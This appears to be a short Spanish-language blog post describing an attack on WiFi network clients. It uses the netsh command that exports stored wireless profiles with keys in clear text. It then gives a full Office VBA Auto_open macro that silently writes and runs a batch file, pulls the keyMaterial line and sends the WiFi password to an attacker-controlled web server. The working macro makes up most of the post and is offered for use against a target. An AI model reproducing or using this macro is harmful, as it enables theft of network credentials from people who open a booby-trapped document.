Cuando se verifica la seguridad de la infraestructura de red inalambrica (WiFi), se suelen realizar pruebas sobre la configuracion de seguridad de la red y la fortaleza del protocolo utilizado, a continuacion un vector de ataque adicional: un ataque a los clientes de dicha red, robando sus credenciales.
Muchos ya conoceran las herramientas de Nirsoft para la recuperacion de passwords, la idea con esta prueba es la misma, obtener la clave almacenada en el registro para luego ser enviada a un determinado sitio (bajo ciertas condiciones).
Para ello existe un comando muy util que nos permitira obtener las claves desde el registro:
netsh wlan export profile folder=. key=clear
Podemos cargar dicha clave en una macro de office para su ejecucion, enviando el resultado a un servidor web bajo nuestro poder:
Sub Auto_open()
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("mw.bat", True)
a.writeline "@echo off"
a.writeline "@netsh wlan export profile folder=. key=clear"
a.writeline "@for /f ""delims="" %%i in ('find ""keyMaterial"" *.xml') do set contenido=""%%i"""
a.writeline "@start http://200.XXX.XXX.XXX/?%contenido%"
Call Shell(Environ$("COMSPEC") & " /c mw.bat", vbHide)
End Sub
Cuando el objetivo ejecute el macro, enviara automaticamente los datos obtenidos hacia el sitio web, en los cuales se encontrará la clave en texto claro, si esta no tiene el parámetro "protected=true" en la configuracion del XML, para mayor informacion acerca de este ultimo punto vean este sitio.
Saludos
Boris
No hay comentarios:
Publicar un comentario